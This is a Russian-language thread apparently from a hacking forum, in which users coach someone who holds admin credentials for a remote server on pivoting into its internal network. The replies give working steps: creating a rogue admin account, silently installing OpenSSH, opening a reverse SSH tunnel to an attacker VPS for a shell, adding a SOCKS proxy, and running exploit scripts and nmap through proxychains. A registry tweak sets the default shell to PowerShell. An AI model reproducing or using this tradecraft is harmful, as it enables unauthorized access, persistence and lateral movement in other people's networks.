• XSS.stack #1 – первый литературный журнал от юзеров форума

Pivoting ssh туннель

1984

HDD-drive
Пользователь
Регистрация
23.04.2021
Сообщения
47
Реакции
4
помогите, пожалуйста, с тунеллированием SSH
имеется удаленный сервер с ip 146.155.242.42 и поднятым на нем rdp c портом 3389 есть учетные данные от этой машины admin password. у этого сервера есть локальная сеть 192.168.1.0/24 и его локальный ip 192.168.1.27
как мне пробросить ssh туннель с моей машины чтобы его локальная сеть отображалась в моих сетевых интерфейсах?
нужен ли белый IP на моей машине, то есть работать с сервера или можно справиться с этой задачей, работая просто через виртуалку?
может быть есть какие-нибудь другие способы?
Спасибо!
 
как мне пробросить ssh туннель с моей машины чтобы его локальная сеть отображалась в моих сетевых интерфейсах?
Она не будет там отражаться, это не VPN. Используя SSH тунель ты направляешь пакеты на свой локальный порт, от туда они уходят на таргет ( на любой , в том числе на тот что за натом или за файерволом - если фаерволл не режет ссш протокол ). Если таргет за натом\файрволом - инициализация соединения должна исходить с таргета.
нужен ли белый IP на моей машине
Да нужен.

Для ssh тунеля порядок действий такой:
1 - на таргете добавьте новую локальную учетную запись администратора типа "admin : Qwerty123456" или юзаете существующую.
2 - на таргете установите openssh.msi с помощью msiexec silent install или любым иным способом
3 - на таргете запусти ssh -R 1111:targetlocalip:22 notroot@VPSIPorDomanename (логинься с паролем vps для юзера notroot) <-- remote-revers-port-forwarding
4 - на VPS запустите ssh -p 1111 admin@127.0.0.1, чтобы получить shell.
для socks прокси ( Dynamic revers port-forwarding ) запусти на впс -> ssh -p 1111 -D 0.0.0.0:1080 admin@127.0.0.1 затем proxychains: socks5 127.0.0.1 1080
далее ставь в конфиг proxychains.conf socks5 127.0.0.1 1080
используй далее любой софт так :
-> proxychains -f proxychains.conf -q exploit.py 10.11.11.11 -pwn hackdepalnet
-> proxychains -f proxychains.conf -q namp 10.11.11.0/24
 
Последнее редактирование:
Извиняюсь, если глупый вопрос, но никак не доходит.
4 - на VPS запустите ssh -p 1111 admin@127.0.0.1, чтобы получить shell.
Сделал, вышло cmd таргета.

ssh -p 1111 -D 0.0.0.0:1080 admin@127.0.0.1
Аналогично.

в proxychains.conf строку добавил, можно чуть подробнее про "затем proxychains: socks5 127.0.0.1 1080" ?
На этом застрял, так как пробую выполнить команду через proxychains -f proxychains.conf - ничего, сеть не видит.
Если кто работал с этим, подскажите)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Сделал, вышло cmd таргета.
чтоб выходило не только кмд делай как советует тот комрад
для socks прокси ( Dynamic revers port-forwarding ) запусти на впс -> ssh -p 1111 -D 0.0.0.0:1080 admin@127.0.0.1 затем proxychains: socks5 127.0.0.1 1080

"затем proxychains: socks5 127.0.0.1 1080" ?
тут имеется ввиду - в файле proxychains.conf меняешь эту строку -
socks4 127.0.0.1 9050
на эту - socks4 127.0.0.1 1080
 
Извиняюсь, если глупый вопрос, но никак не доходит.

Сделал, вышло cmd таргета.


Аналогично.

в proxychains.conf строку добавил, можно чуть подробнее про "затем proxychains: socks5 127.0.0.1 1080" ?
На этом застрял, так как пробую выполнить команду через proxychains -f proxychains.conf - ничего, сеть не видит.
Если кто работал с этим, подскажите)
То что вышло цмд таргета - это и есть твой шел, есть аргумент -N тогда ссш будет пробрасывать порт без исполнения команд
кстати можно поменять цмд на пвш командой
Код:
New-ItemProperty -Path "HKLM:\SOFTWARE\OpenSSH" -Name DefaultShell -Value "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -PropertyType String -Force
при выполнении второй команды с ключем -D ты поднимаешь сокс на твоей впс под 127.0.0.1 на 1080 порту который будет перенаправлять трафик через "таргет"
по дефолту конфиг проксичейнс находится по пути /etc/proxychains4.conf
в нем
Код:
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 9050
ссш поднимает SOCKS5 на 1080 порту, можешь проверить слушается ли порт с помощью команды
Код:
sudo netstat -tunlp
значит ты меняешь строку на ту которую указалFREEM4N
Код:
socks5 127.0.0.1 1080
 
То что вышло цмд таргета - это и есть твой шел, есть аргумент -N тогда ссш будет пробрасывать порт без исполнения команд
кстати можно поменять цмд на пвш командой
Код:
New-ItemProperty -Path "HKLM:\SOFTWARE\OpenSSH" -Name DefaultShell -Value "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -PropertyType String -Force
при выполнении второй команды с ключем -D ты поднимаешь сокс на твоей впс под 127.0.0.1 на 1080 порту который будет перенаправлять трафик через "таргет"
по дефолту конфиг проксичейнс находится по пути /etc/proxychains4.conf
в нем
Код:
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 9050
ссш поднимает SOCKS5 на 1080 порту, можешь проверить слушается ли порт с помощью команды
Код:
sudo netstat -tunlp
значит ты меняешь строку на ту которую указалFREEM4N
Код:
socks5 127.0.0.1 1080

Спасибо, разобрался. Все заработало)
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх